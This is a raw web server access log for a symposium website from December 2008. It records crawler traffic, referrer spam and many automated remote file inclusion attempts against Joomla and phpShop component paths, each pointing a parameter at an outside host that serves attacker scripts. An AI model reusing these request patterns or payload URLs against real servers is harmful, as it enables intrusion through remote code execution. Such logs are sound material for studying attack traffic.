221.229.126.149 - - [28/Dec/2008:08:32:31 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
38.100.8.51 - - [28/Dec/2008:13:43:38 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "panscient.com" 0 www.geil-symposium.com
38.100.8.51 - - [28/Dec/2008:13:43:38 -0500] "GET / HTTP/1.1" 200 326 "-" "panscient.com" 0 www.geil-symposium.com
38.100.8.51 - - [28/Dec/2008:13:43:39 -0500] "GET /logs HTTP/1.1" 301 343 "-" "panscient.com" 0 www.geil-symposium.com
38.100.8.51 - - [28/Dec/2008:13:43:39 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "panscient.com" 0 www.geil-symposium.com
195.246.199.254 - - [28/Dec/2008:16:44:00 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bargains-buy.com/images/dvd/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
195.246.199.254 - - [28/Dec/2008:16:44:00 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bargains-buy.com/images/dvd/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
195.246.199.254 - - [28/Dec/2008:16:44:00 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bargains-buy.com/images/dvd/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
208.80.194.56 - - [28/Dec/2008:19:16:30 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; acc=none; (none); FunWebProducts; .NET CLR 1.0.3705; SpamBlockerUtility 4.8.0)" 0 www.geil-symposium.com
74.6.22.92 - - [28/Dec/2008:19:55:14 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.92 - - [28/Dec/2008:19:55:14 -0500] "GET /logs HTTP/1.0" 301 323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.92 - - [28/Dec/2008:19:55:14 -0500] "GET /logs/ HTTP/1.0" 200 434 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.55 - - [28/Dec/2008:23:16:55 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; PeoplePal 3.0; ZangoToolbar 4.8.3; yplus 5.1.04b)" 0 www.geil-symposium.com
203.209.252.68 - - [28/Dec/2008:23:41:44 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [28/Dec/2008:23:41:47 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
74.6.22.92 - - [29/Dec/2008:01:25:14 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.92 - - [29/Dec/2008:01:26:40 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
194.149.234.21 - - [29/Dec/2008:02:14:19 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
194.149.234.21 - - [29/Dec/2008:02:14:19 -0500] "GET /logs/error.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
194.149.234.21 - - [29/Dec/2008:02:14:19 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
98.217.249.164 - - [29/Dec/2008:03:22:37 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buycialisonlineviagra" "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5) Gecko/20041220 K-Meleon/0.9" 0 www.geil-symposium.com
98.217.249.164 - - [29/Dec/2008:03:22:37 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buycialisonlineviagra" "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5) Gecko/20041220 K-Meleon/0.9" 0 www.geil-symposium.com
98.217.249.164 - - [29/Dec/2008:03:22:37 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buycialisonlineviagra" "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5) Gecko/20041220 K-Meleon/0.9" 0 www.geil-symposium.com
98.217.249.164 - - [29/Dec/2008:03:22:38 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buycialisonlineviagra" "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5) Gecko/20041220 K-Meleon/0.9" 0 www.geil-symposium.com
24.47.231.86 - - [29/Dec/2008:03:22:39 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buycialisonlineviagra" "Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)" 0 www.geil-symposium.com
24.47.231.86 - - [29/Dec/2008:03:22:42 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buycialisonlineviagra" "Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)" 0 www.geil-symposium.com
24.47.231.86 - - [29/Dec/2008:03:22:47 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buycialisonlineviagra" "Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)" 0 www.geil-symposium.com
24.47.231.86 - - [29/Dec/2008:03:22:52 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buycialisonlineviagra" "Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)" 1 www.geil-symposium.com
84.61.209.134 - - [29/Dec/2008:04:31:34 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" 0 www.geil-symposium.com
84.61.209.134 - - [29/Dec/2008:04:31:35 -0500] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" 0 www.geil-symposium.com
84.61.209.134 - - [29/Dec/2008:04:31:35 -0500] "GET /logs/ HTTP/1.1" 200 450 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
84.61.209.134 - - [29/Dec/2008:04:31:36 -0500] "GET /logs/access.log HTTP/1.1" 200 230863 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 1 www.geil-symposium.com
84.61.209.134 - - [29/Dec/2008:04:31:38 -0500] "GET /logs/error.log HTTP/1.1" 200 178881 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" 1 www.geil-symposium.com
72.30.142.83 - - [29/Dec/2008:06:02:47 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.83 - - [29/Dec/2008:06:02:48 -0500] "GET /logs/access.log.20081202.gz HTTP/1.0" 200 52932 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.15 - - [29/Dec/2008:06:45:27 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [29/Dec/2008:06:45:29 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
72.30.142.83 - - [29/Dec/2008:07:50:13 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.142.83 - - [29/Dec/2008:07:50:13 -0500] "GET /logs/access.log HTTP/1.0" 200 232233 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
220.181.32.22 - - [29/Dec/2008:08:09:49 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
61.135.168.39 - - [29/Dec/2008:08:12:19 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
220.181.32.22 - - [29/Dec/2008:10:07:53 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
61.135.168.39 - - [29/Dec/2008:10:11:42 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
67.195.37.156 - - [29/Dec/2008:10:30:32 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.156 - - [29/Dec/2008:10:30:32 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
209.46.18.195 - - [29/Dec/2008:15:09:48 -0500] "GET /errors.php?error=http://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
209.46.18.195 - - [29/Dec/2008:15:09:48 -0500] "GET /logs/errors.php?error=http://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
209.46.18.195 - - [29/Dec/2008:15:09:48 -0500] "GET /logs/error.log/errors.php?error=http://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
209.46.18.195 - - [29/Dec/2008:15:09:50 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
209.46.18.195 - - [29/Dec/2008:15:09:50 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
209.46.18.195 - - [29/Dec/2008:15:09:50 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://clan.gotr00t.net/temp//ctrl.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
140.130.101.5 - - [29/Dec/2008:15:30:00 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
140.130.101.5 - - [29/Dec/2008:15:30:00 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
140.130.101.5 - - [29/Dec/2008:15:30:00 -0500] "GET /logs/error.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
66.7.193.220 - - [29/Dec/2008:15:31:00 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
66.7.193.220 - - [29/Dec/2008:15:31:00 -0500] "GET /logs/error.log%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
66.7.193.220 - - [29/Dec/2008:15:31:00 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" 0 www.geil-symposium.com
66.7.193.220 - - [29/Dec/2008:15:33:04 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" 0 www.geil-symposium.com
66.7.193.220 - - [29/Dec/2008:15:33:04 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" 0 www.geil-symposium.com
66.7.193.220 - - [29/Dec/2008:15:33:08 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" 0 www.geil-symposium.com
140.130.101.5 - - [29/Dec/2008:15:38:14 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" 0 www.geil-symposium.com
140.130.101.5 - - [29/Dec/2008:15:38:14 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" 0 www.geil-symposium.com
140.130.101.5 - - [29/Dec/2008:15:38:14 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" 0 www.geil-symposium.com
209.51.153.114 - - [29/Dec/2008:15:42:31 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
209.51.153.114 - - [29/Dec/2008:15:42:31 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
209.51.153.114 - - [29/Dec/2008:15:42:31 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" 0 www.geil-symposium.com
140.130.101.5 - - [29/Dec/2008:15:46:46 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" 0 www.geil-symposium.com
140.130.101.5 - - [29/Dec/2008:15:46:46 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" 0 www.geil-symposium.com
140.130.101.5 - - [29/Dec/2008:15:46:46 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" 0 www.geil-symposium.com
212.51.218.130 - - [29/Dec/2008:16:52:31 -0500] "GET /logs/error.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://le-cheval-d-odin.net/forum/shared_files/avatars/albania.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
212.51.218.130 - - [29/Dec/2008:16:52:31 -0500] "GET /logs/error.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://le-cheval-d-odin.net/forum/shared_files/avatars/albania.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
212.51.218.130 - - [29/Dec/2008:16:52:31 -0500] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://le-cheval-d-odin.net/forum/shared_files/avatars/albania.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
212.51.218.130 - - [29/Dec/2008:16:52:31 -0500] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://le-cheval-d-odin.net/forum/shared_files/avatars/albania.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
212.51.218.130 - - [29/Dec/2008:16:52:31 -0500] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://le-cheval-d-odin.net/forum/shared_files/avatars/albania.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
212.51.218.130 - - [29/Dec/2008:16:52:31 -0500] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://le-cheval-d-odin.net/forum/shared_files/avatars/albania.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
216.239.0.245 - - [29/Dec/2008:16:54:24 -0500] "GET /logs/error.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://le-cheval-d-odin.net/forum/shared_files/avatars/albania.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
216.239.0.245 - - [29/Dec/2008:16:54:24 -0500] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://le-cheval-d-odin.net/forum/shared_files/avatars/albania.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
216.239.0.245 - - [29/Dec/2008:16:54:24 -0500] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://le-cheval-d-odin.net/forum/shared_files/avatars/albania.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
216.239.0.245 - - [29/Dec/2008:16:54:24 -0500] "GET /logs/error.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://le-cheval-d-odin.net/forum/shared_files/avatars/albania.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
216.239.0.245 - - [29/Dec/2008:16:54:25 -0500] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://le-cheval-d-odin.net/forum/shared_files/avatars/albania.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
216.239.0.245 - - [29/Dec/2008:16:54:25 -0500] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://le-cheval-d-odin.net/forum/shared_files/avatars/albania.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
208.53.131.50 - - [29/Dec/2008:18:44:32 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/12/28/2242601/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.813" 0 www.geil-symposium.com
208.53.131.50 - - [29/Dec/2008:18:44:32 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/12/28/2242601/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.813" 0 www.geil-symposium.com
208.53.131.50 - - [29/Dec/2008:18:44:32 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/12/28/2242601/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.813" 0 www.geil-symposium.com
198.68.180.60 - - [29/Dec/2008:18:45:00 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/12/28/2242601/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.69" 0 www.geil-symposium.com
198.68.180.60 - - [29/Dec/2008:18:45:01 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/12/28/2242601/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.69" 0 www.geil-symposium.com
198.68.180.60 - - [29/Dec/2008:18:45:01 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/12/28/2242601/id3.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.69" 0 www.geil-symposium.com
208.80.194.52 - - [29/Dec/2008:19:17:01 -0500] "GET / HTTP/1.0" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; InfoPath.1; yplus 5.1.04b)" 0 www.geil-symposium.com
87.101.4.49 - - [29/Dec/2008:20:29:11 -0500] "GET /logs/error.log//?mosConfig_absolute_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" 0 www.geil-symposium.com
87.101.4.49 - - [29/Dec/2008:20:29:11 -0500] "GET //?mosConfig_absolute_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 200 326 "-" "libwww-perl/5.79" 0 www.geil-symposium.com
87.101.4.49 - - [29/Dec/2008:20:29:12 -0500] "GET /logs//?mosConfig_absolute_path=http://www.mandlakaziestates.co.za/contact.txt??? HTTP/1.1" 200 455 "-" "libwww-perl/5.79" 0 www.geil-symposium.com
216.153.214.235 - - [29/Dec/2008:20:43:02 -0500] "GET /logs/error.log/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.rearrangefurniture.com/myimages/read.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
216.153.214.235 - - [29/Dec/2008:20:43:03 -0500] "GET /toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.rearrangefurniture.com/myimages/read.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
216.153.214.235 - - [29/Dec/2008:20:43:03 -0500] "GET /logs/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.rearrangefurniture.com/myimages/read.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" 0 www.geil-symposium.com
66.235.124.38 - - [29/Dec/2008:20:58:52 -0500] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
66.235.124.38 - - [29/Dec/2008:20:58:52 -0500] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
61.135.168.39 - - [29/Dec/2008:23:10:12 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
220.181.32.22 - - [29/Dec/2008:23:10:15 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
208.80.194.120 - - [29/Dec/2008:23:29:16 -0500] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {FE8C41BA-CD36-40A0-17F0-2169788A4682})" 0 www.geil-symposium.com
220.181.32.22 - - [30/Dec/2008:01:10:58 -0500] "GET / HTTP/1.1" 200 326 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" 0 www.geil-symposium.com
66.184.140.41 - - [30/Dec/2008:02:30:13 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/levitraonlinezxc" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
66.184.140.41 - - [30/Dec/2008:02:30:17 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/levitraonlinezxc" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
66.184.140.41 - - [30/Dec/2008:02:30:20 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/levitraonlinezxc" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
66.184.140.41 - - [30/Dec/2008:02:30:28 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/levitraonlinezxc" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
68.84.120.194 - - [30/Dec/2008:02:30:28 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buypropeciauk" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128" 0 www.geil-symposium.com
68.84.120.194 - - [30/Dec/2008:02:30:32 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buypropeciauk" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128" 0 www.geil-symposium.com
68.84.120.194 - - [30/Dec/2008:02:30:35 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buypropeciauk" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128" 0 www.geil-symposium.com
68.84.120.194 - - [30/Dec/2008:02:30:40 -0500] "GET / HTTP/1.0" 200 310 "http://www.esnips.com/user/buypropeciauk" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128" 0 www.geil-symposium.com
193.86.246.132 - - [30/Dec/2008:05:22:48 -0500] "GET /logs/error.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.caverna.kit.net/scans/bit.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" 0 www.geil-symposium.com
